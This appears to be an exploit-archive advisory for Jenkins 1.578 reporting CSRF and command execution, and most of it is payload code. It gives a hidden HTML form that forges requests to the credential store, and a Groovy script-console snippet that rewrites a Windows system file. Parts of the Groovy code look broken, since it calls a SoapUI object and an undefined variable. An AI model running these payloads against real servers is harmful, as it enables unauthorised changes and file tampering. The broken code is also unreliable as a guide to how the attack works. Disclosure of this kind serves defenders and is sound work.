Jenkins 1.578 - Multiple Vulnerabilities

2014-09-08 19:05:11

#Affected Vendor: http://jenkins-ci.org/
#Date: 03/09/2014
#Discovered by: JoeV
#Type of vulnerability: CSRF and Command Execution

#Tested on: Windows 7
#Version : 1.578

#Description: Jenkins is susceptible to CSRF attack and command
execution. Using groovy one can fire any command and get it executed
by the script console thus able to access files, registry keys, values
and folders which is outbound for Jenkins.


#CSRF

--------

#Payload:

<form method="POST" name="form0"
action="http://localhost:8090/credential-store/createDomain">

<input type="hidden" name="_.name" value="xyz"/>
<input type="hidden" name="description" value="abc"/>
<input type="hidden" name="json" value="{'name': 'xyz', 'description': 'abc'}"/>
<input type="hidden" name="Submit" value="OK"/>
</form>


Command Execution (/script)
-------------------------------------
ArrayList pids = null
PrintWriter writer = null

File f = new File("C:/Windows/System32/Services.msc")

if (f.length() > 0){
pids = new ArrayList()
f.eachLine { line -> pids.add(line) }
println("Item to be removed: " + pids.get(0))
testRunner.testCase.setPropertyValue( "personId", pid )
pids.remove(0)
println pids
writer = new PrintWriter(f)
pids.each { id -> writer.println(id) }
writer.close()
}
else{
println "Null"
}

--
Regards,

*Joel V*

Fixes

No fixes

In order to submit a new fix you need to be registered.